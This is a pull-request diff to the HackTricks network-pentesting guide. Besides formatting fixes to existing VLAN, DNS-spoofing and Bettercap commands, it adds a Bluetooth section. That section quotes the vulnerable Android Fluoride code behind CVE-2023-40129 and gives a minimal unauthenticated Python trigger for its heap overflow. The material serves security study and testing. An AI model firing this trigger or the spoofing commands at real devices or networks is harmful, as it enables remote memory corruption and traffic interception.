Merge pull request #1530 from HackTricks-wiki/update_Paint_it_blue__Attacking_the_bluetooth_stack_20251027_183112

Paint it blue Attacking the bluetooth stack

Author: carlospolop

src/generic-methodologies-and-resources/pentesting-network/README.md

@@ -333,7 +333,10 @@ By analyzing the STP frames, **we learn about the existence of VLAN 30 and VLAN
 Once you known VLAN IDs and IPs values, you can **configure a virtual interface to attack a specific VLAN**.\
 If DHCP is not available, then use _ifconfig_ to set a static IP address.
 
-```
+<details>
+<summary>VLAN interface configuration (example)</summary>
+
+```bash
 root@kali:~# modprobe 8021q
 root@kali:~# vconfig add eth1 250
 Added VLAN with VID == 250 to IF -:eth1:-
@@ -352,6 +355,9 @@ eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
 root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
 ```
 
+</details>
+
+
 ```bash
 # Another configuration example
 modprobe 8021q
@@ -691,15 +697,22 @@ set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on
 **Configure own DNS with dnsmasq**
 
 ```bash
-apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
+apt-get install dnsmasq
+echo "addn-hosts=dnsmasq.hosts" > dnsmasq.conf
+echo "127.0.0.1   domain.example.com" > dnsmasq.hosts
+sudo dnsmasq -C dnsmasq.conf --no-daemon
 dig @localhost domain.example.com # Test the configured DNS
 ```
 
+
 ### Local Gateways
 
 Multiple routes to systems and networks often exist. Upon building a list of MAC addresses within the local network, use _gateway-finder.py_ to identify hosts that support IPv4 forwarding.
 
-```
+<details>
+<summary>gateway-finder usage example</summary>
+
+```bash
 root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
 root@kali:~# cd gateway-finder/
 root@kali:~# arp-scan -l | tee hosts.txt
@@ -717,6 +730,9 @@ gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
 [+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
 ```
 
+</details>
+
+
 ### [Spoofing LLMNR, NBT-NS, and mDNS](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
 
 For local host resolution when DNS lookups are unsuccessful, Microsoft systems rely on **Link-Local Multicast Name Resolution (LLMNR)** and the **NetBIOS Name Service (NBT-NS)**. Similarly, **Apple Bonjour** and **Linux zero-configuration** implementations utilize **Multicast DNS (mDNS)** for discovering systems within a network. Due to the unauthenticated nature of these protocols and their operation over UDP, broadcasting messages, they can be exploited by attackers aiming to redirect users to malicious services.
@@ -796,7 +812,7 @@ Note that in order to perform this attack the victim has to try to access initia
 
 More info [here](https://www.bettercap.org/legacy/#hsts-bypass), [here](https://www.slideshare.net/Fatuo__/offensive-exploiting-dns-servers-changes-blackhat-asia-2014) and [here](https://security.stackexchange.com/questions/91092/how-does-bypassing-hsts-with-sslstrip-work-exactly).
 
-**sslStrip or sslStrip+ doesn;t work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
+**sslStrip or sslStrip+ doesn't work anymore. This is because there are HSTS rules presaved in the browsers, so even if it's the first time that a user access an "important" domain he will access it via HTTPS. Also, notice that the presaved rules and other generated rules can use the flag** [**`includeSubdomains`**](https://hstspreload.appspot.com) **so the** _**wwww.facebook.com**_ **example from before won't work anymore as** _**facebook.com**_ **uses HSTS with `includeSubdomains`.**
 
 TODO: easy-creds, evilgrade, metasploit, factory
 
@@ -840,6 +856,9 @@ Other things to test is to try to sign the certificate with a valid certificate
 
 ## Bettercap
 
+<details>
+<summary>Common Bettercap commands</summary>
+
 ```bash
 # Events
 events.stream off #Stop showing events
@@ -866,6 +885,9 @@ set wifi.ap.encryption false #If true, WPA2
 wifi.recon on; wifi.ap
 ```
 
+</details>
+
+
 ### Active Discovery Notes
 
 Take into account that when a UDP packet is sent to a device that do not have the requested port an ICMP (Port Unreachable) is sent.
@@ -897,6 +919,70 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
 Bettercap broadcast WSD packets searching for services (UDP Port 3702).
 
 
+## Bluetooth (L2CAP/ATT/GATT) Attacks
+
+- Android Fluoride exposes services over L2CAP PSMs (e.g., SDP 0x0001, RFCOMM 0x0003, BNEP 0x000F, AVCTP 0x0017/0x001B, AVDTP 0x0019, ATT/GATT 0x001F). Services register via:
+
+```c
+uint16_t L2CA_Register2(uint16_t psm, const tL2CAP_APPL_INFO& p_cb_info,
+                        bool enable_snoop, tL2CAP_ERTM_INFO* p_ertm_info,
+                        uint16_t my_mtu, uint16_t required_remote_mtu,
+                        uint16_t sec_level);
+```
+
+- BlueBlue framework enables Scapy-based L2CAP/ATT crafting (built on BlueBorne l2cap_infra). Example:
+
+```python
+acl  = ACLConnection(src_bdaddr, dst_bdaddr, auth_mode='justworks')
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=672)
+gatt.send_frag(p8(GATT_READ)+p16(1234))
+print(gatt.recv())
+```
+
+- CVE-2023-40129 (Fluoride GATT): integer underflow in Read Multiple Variable response builder can cause ~64KB heap overflow when MTU truncates a variable-length element but the +2 length field is not accounted for.
+
+<details>
+<summary>Root cause (GATT Read Multiple Variable)</summary>
+
+```c
+static void build_read_multi_rsp(tGATT_SR_CMD* p_cmd, uint16_t mtu) {
+  uint16_t ii, total_len, len; uint8_t* p; bool is_overflow=false;
+  len = sizeof(BT_HDR) + L2CAP_MIN_OFFSET + mtu;
+  BT_HDR* p_buf = (BT_HDR*)osi_calloc(len); p_buf->offset=L2CAP_MIN_OFFSET;
+  p = (uint8_t*)(p_buf + 1) + p_buf->offset; *p++ = GATT_RSP_READ_MULTI_VAR;
+  p_buf->len=1;
+  for (ii=0; ii<p_cmd->multi_req.num_handles; ii++) {
+    tGATTS_RSP* p_rsp = ...; // dequeued
+    if (p_rsp) {
+      total_len = (p_buf->len + p_rsp->attr_value.len);
+      if (p_cmd->multi_req.variable_len) total_len += 2;
+      if (total_len > mtu) {
+        len = p_rsp->attr_value.len - (total_len - mtu); // BUG: ignores +2
+        is_overflow = true;
+      } else { len = p_rsp->attr_value.len; }
+      if (p_cmd->multi_req.variable_len) { UINT16_TO_STREAM(p, len); p_buf->len += 2; }
+      memcpy(p, p_rsp->attr_value.value, len); // heap overflow
+      if (!is_overflow) p += len; p_buf->len += len; if (is_overflow) break;
+    }
+  }
+}
+```
+
+- On variable-length entries, the overflow path subtracts only (total_len - mtu), ignoring the +2 length field, so len underflows (e.g., 0xFFFE) and memcpy writes ~64KB past the end of the buffer.
+</details>
+
+- Minimal unauthenticated trigger (small MTU forces underflow on the 4th attribute):
+
+```python
+# GATT_REQ_READ_MULTI_VAR (0x20), MTU=55
+acl  = ACLConnection(interface, bdaddr)
+gatt = acl.l2cap_connect(psm=PSM_ATT, mtu=55)
+pkt  = b'\x20'  # opcode
+pkt += p16(9); pkt += p16(9); pkt += p16(9); pkt += p16(9)
+gatt.send(pkt)
+# On 4th insert: p_buf->len=55 (1 + 3*(16+2)), total_len=73 -> len=16-(73-55)=-2 -> ~64KB overwrite
+```
+
 ### Telecom / Mobile-Core (GTP) Exploitation
 
 
@@ -910,6 +996,8 @@ telecom-network-exploitation.md
 - **Network Security Assessment: Know Your Network (3rd edition)**
 - **Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood**
 - [https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+- [Paint it blue: Attacking the bluetooth stack (Synacktiv)](https://www.synacktiv.com/en/publications/paint-it-blue-attacking-the-bluetooth-stack)
+- [BlueBorne L2CAP testing infra (l2cap_infra)](https://github.com/ArmisSecurity/blueborne/tree/master/l2cap_infra)